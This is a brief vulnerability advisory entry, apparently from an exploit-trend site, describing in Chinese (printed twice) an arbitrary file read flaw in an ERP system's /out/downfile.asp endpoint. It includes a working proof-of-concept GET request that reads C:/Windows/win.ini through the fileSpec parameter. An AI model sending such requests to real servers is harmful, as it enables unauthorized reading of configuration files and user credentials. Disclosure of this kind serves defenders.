Description
ERP系统的/out/downfile.asp接口存在任意文件读取漏洞,攻击者可以通过构造特定的请求读取服务器上的任意文件,从而导致敏感信息泄露,例如系统配置文件、用户凭据等。
ERP系统的/out/downfile.asp接口存在任意文件读取漏洞,攻击者可以通过构造特定的请求读取服务器上的任意文件,从而导致敏感信息泄露,例如系统配置文件、用户凭据等。
GET /out/downfile.asp?fileSpec=C:/Windows/win.ini HTTP/1.1
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.